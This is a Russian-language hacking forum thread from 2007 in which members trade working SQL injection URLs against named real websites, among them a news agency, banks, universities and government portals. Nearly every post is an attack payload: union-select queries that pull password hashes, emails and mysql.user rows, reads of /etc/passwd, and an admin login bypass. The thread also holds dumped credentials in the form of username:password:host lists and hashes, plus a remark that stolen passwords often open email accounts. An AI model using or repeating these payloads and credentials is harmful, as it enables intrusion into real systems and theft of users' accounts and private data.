SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    http://www.operator.vesti.ru/

    Слепой SQL-Injection с фильтруемой кавычкой на сайте информационного агентства "ВЕСТИ". В Oracle имеется куча таблиц, куча схем, коммерческая информация... В общем очень большой объём. Вникать что к чему не было времени. Кому интересно - разбирайтесь. Атака была начата с поддомена чтобы не светиться особо с багой.

    По характерному поведению удалось выяснить, что там крутится Oracle:

    Oracle9i Enterprise Edition Release 9.2.0.4.0 - 64bit Production
    PL/SQL Release 9.2.0.4.0 - Production
    CORE 9.2.0.3.0 Production
    TNS for Solaris: Version 9.2.0.4.0 - Production
    NLSRTL Version 9.2.0.4.0 - Production

    Пользователь, от которого работает пага: www

    Можем посмотреть других порегеных пользователей: UTRO, RTRSALE, CULTTV, CULTRADIO, CULTGDRZ, RADIORUS, CULTCORP, CAMERAMAN, AGENCY, RMANCAT, EXPORTER, WWW, SSL, BVB, ALINA, NIKOLAEVA, OPERATOR, LOADER, KIRA_CH, NEWSUN, GENE, BELKINA, ANGELINA, IGRITSKY, BABINTSEVA, BEREZHANSKII, LOGUNOV, PRIOROV, BIRD, FISHER, RYABOVA, ANDREEVA, MALASH, TITOVA, YUDINA, ELIAS, TRAVINSKAYA, SKOPINCEVA, ARTUR, DENIS и т.д.

    Смотрим таблиц и овнеров таблиц. Не забываем, что наш овнер - www

    Можем смотреть таблицы по определённому овнеру. Овнера разумеется посимвольно заворачиваем в CHR().

    Так можно смотреть имена полей таблиц на примере таблицы FUSERS.
     
    6 people like this.
  2. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Для любителей джаза

    код:

    http://www.souljazzrecords.co.uk/releases/?id=4973+union+select+1,concat(password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14+from+accounts+limit+3907,1/*

    в поле логина вводить емейл

    p.s в большинстве случаев пароли так-же подходят к почтовым ящикам ;)
     
    2 people like this.
  3. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=@ @version--
    Microsoft SQL Server 2000 - 8.00.2040 (Intel X86) May 13 2005 18:33:17 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
    Выводим таблицу где есть колонка password
    Code:
    http://www.transinvestbank.ru /docs/tpl/new.asp?id=1+or+1=(select+top+1+ table_name+from+information_schema.columns+where+column_name+like+'password')--
    Нужная таблица - users =)
    Узнаём имена колонок
    На этом, пожалуй, остановимся =))
    Code:
    http://www.elporvenir. com.mx/avisos_cat.asp? cat_id=1+or+1=@@version--
    Code:
    http://www.cap.edu.mx /Content.aspx? ID=1+or+1=@@version--
    Code:
    http://www.correo-gto.com.mx /notas.asp?id= 1+or+1=@@version--
    Code:
    http://www.tashop.ru /order/frame.asp?id= 1+or+1=@@version--
     
    #3343 Maxyks, 19 Oct 2007
    Last edited: 19 Oct 2007
    1 person likes this.
  4. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Северо-Восточный Инвестиционный Банк
    User: [email protected]
    Version: 4.0.27-max-log
     
    2 people like this.
  5. Heavy Metal

    Heavy Metal Member

    Joined:
    16 Sep 2007
    Messages:
    19
    Likes Received:
    27
    Reputations:
    7
    Code:
    http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9/*
    http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,Username,userpass),9+from+hpsas_recsports.Tigeradmin_Users/*
    http://www.recsports.uga.edu/club_profile.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user,password),9+from+mysql.user/*
    Code:
    http://www.essor.gov.ml/cgi-bin/view_article.pl?id=-1+union+select+1,user,password,4,5,6,7,8,9+from+mysql.user--
     
    5 people like this.
  6. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.gelyon.ru/news.php?id=-1+union+select+1,2,concat(version(),0x2F,database(),0x2F,user()),4,5,6/*

    4.0.26/wwwgelyonru/[email protected]


    http://www.head-hunting.ru/z_parser.php?base_name=headhunting_second&id=-1+union+select+1,2,concat(version(),0x2F,database(),0x2F,user()),4,5,6,7/*

    4.1.21-log/db00084672/00084672@localhost


    http://www.solange.ru/gallery/show.phtm?s=14&z=0&t=-1+union+select+concat(version(),0x2F,database(),0x2F,user()),2,3,4,5,6,7,8,9,10/*

    4.1.21-standard/intermoda/[email protected]


    http://www.chernomor.com/vzrosltours.php?tp=1&obj=-1+union+select+1,2,3,4,5,6,concat(version(),0x2F,database(),0x2F,user()),8,9,10/*

    4.1.22-standard/chernomo_main/chernomo_main@localhost


    http://fest.camps.su/event.php?id=-1+union+select+1,2,concat(version(),0x2F,database(),0x2F,user()),4/*

    4.1.21-standard-log/campssu_main/campssu_user@localhost
     
    1 person likes this.
  7. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.monbat.com/index.php?l_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4/*&change_lang=yes
    DOTSTUDIO@LOCALHOST:5.0.45-LOG:WEB
    Code:
    http://www.oursportscentral.com/services/maps/largemap.php?l_id=-1'+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
    oursport_public@localhost:4.1.20-log:eek:ursport_osc
    Code:
    http://www.rentayacht.gr/location.php?l_id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(version(),0x71),0x71),7,8,9,10,11/*
    Code:
    http://www.oli-lacke.de/firma.php?m_id=1&l_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8/*&lang=ru
    [email protected]:5.0.32-Debian_7etch1~bpo.1-log:eek:li_lacke_de
    Code:
    http://www.ntnui.no/ogruppa/paamelding/paameldingsliste.php?l_id=9999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16/*
    [email protected]:4.0.18-Max:eek:gruppa_db
     
    3 people like this.
  8. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,177
    Likes Received:
    1,156
    Reputations:
    202
    dev:Jahdeha5:dev.build.ppckernel.org
    hercules:hohKie4r:hercules.xorsis.com
    hermes:Chofei5w:hermes.ppckernel.org
    m2:yie7Phoi:m2.bccd.cluster.earlham.edu
    c15:lohcooD2:c15.cluster.earlham.edu
    acl2:eeceaZ8u:acl2.cs.earlham.edu
    tobias:tmb2h3a:tobias.cluster.earlham.edu
    hermes64:Chofei5w:hermes.ppckernel.org
    admin:c84258e9c39059a89ab77d846ddab909 мд5()
    admin:admin2
     
    3 people like this.
  9. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.infohotel.ru/hotel.php?district=0&subway=0&room=0&price=0&search=2&page=0&id=-1+union+select+1,2,3,concat(version(),0x2F,database(),0x2F,user())/*

    5.0.27/petroholru_info/[email protected] доступ к information_schema есть. ничего толкового не нашел


    http://sovetnik-n.spb.ru/shownews.php?id=-1+union+select+1,2,3,concat(version(),0x2F,database(),0x2F,user()),5,6,7,8,9,10/*

    4.1.20/sovetnik_n/sovetnik_n@localhost
     
    2 people like this.
  10. Elvis000

    Elvis000 Патриот

    Joined:
    23 Apr 2007
    Messages:
    600
    Likes Received:
    339
    Reputations:
    148
    Всероссийский туроператор свадебных путешествий

    Code:
    http://www.pssp.ru/services.php?s=999999999999+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/*
    юзер:[email protected]
    база:db_galeeva_1
    версия:4.1.18
     
    4 people like this.
  11. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://geolog.mnr.gov.ru/part/?pid=-1/**/union/**/select/**/1,LOAD_FILE('/etc/passwd'),3/*
     
    3 people like this.
  12. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Code:
    http://gostorgi.ru/z/tenders.php?tt=9999&rc='+union+select+1,2,user,password+from+mysql.user/*
    1. root — 72f840f85cf3bb40
    2. gostorgi — 72f840f85cf3bb40
     
    1 person likes this.
  13. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 ElteRUS
    По поводу http://www.infohotel.ru
    Тут есть более серьезная иньекция. http://www.infohotel.ru/admin/ в поле логин пишем 1' or 1=1/* в поле пароль любое. Мы в админке...

    Незнаю как ты но я нашел таблицу spb_users, в ней поля username, password, там значения
    username-admin
    password-3fe4220069643d6d
    Сильно подозреваю что это для входа в админку :)
    Но ввиду 1' or 1=1/* становиться неактуальным, тем более что хеш я не расшифровал.
     
    1 person likes this.
  14. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    http://www.fnews.ru/archive.php?s=news&id=-1+union+select+1,2,3,4,concat(username,char(64),user_password,0x25,user_email),6,7,8,9,10,11,12+from+phpbb_users+limit+1,1/*
     
    4 people like this.
  15. mister

    mister Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    4
    Code:
    http://www.bsu.edu.ru/utils/download.asp?idf=1+and+1=@@version--
     
  16. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.adamproject.net/dispositif.php?id_j=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7/*
    adam@localhost:5.0.32-Debian_7etch1-log:adam
    Code:
    http://lesminots.com/resume0304.php?id_j=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*
    [email protected]:5.0.26-log:eek:cblklesmin
    Code:
    http://www.bonus33.pl/oferta.php?id_z=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())/*
    poczta_bonus@localhost:5.0.33-log:poczta_bonus
    Code:
    http://www.tswisla.pl/wislamcarthur/inc/zawodnik.php?id_z=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10/*
    5.0.24-Debian_0.dotdeb.0-log
     
    2 people like this.
  17. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    edu

    MySQL 4.x.x.

    Code:
    http://spacegrant.nmsu.[B]edu[/B]/isps/page.php?num=-6'+union+select+1,2,user(),4,5/*
    
    MySQL 3.x.x.

    Code:
    http://www.auburn.[B]edu[/B]/oit/oitnews/article.php?num=57+/*!40000+and+0+*/
     
    #3357 [53x]Shadow, 20 Oct 2007
    Last edited: 21 Oct 2007
    3 people like this.
  18. -MoLoToK-

    -MoLoToK- Elder - Старейшина

    Joined:
    4 Oct 2007
    Messages:
    30
    Likes Received:
    23
    Reputations:
    3
    ФК Химки
    Code:
    http://fckhimki.ru/modules/news/index.php?current_id=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    [email protected]
    Версия 4.0.27-max-log

    ФК Торпедо
    Code:
    http://www.torpedo.ru/gb/comments.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+news/*
     
    #3358 -MoLoToK-, 21 Oct 2007
    Last edited: 21 Oct 2007
    2 people like this.
  19. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Интернет-провайдер в Тушино
    root;396c55134cded03d
    4.0.20-log
     
    1 person likes this.
  20. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    fobo.ru


    http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(version(),0x2F,database(),0x2F,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52/*

    5.0.45-Dotdeb_0.dotdeb.0-log/fobo/fobo@localhost

    http://fobo.ru/member.php?action=getinfo&id=-1'+union+select+1,2,concat(username,0x2F,password,0x2F,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+user+limit+10000,1/*

    имя\хеш\мейл 71530 участников )))
     
    1 person likes this.
Thread Status:
Not open for further replies.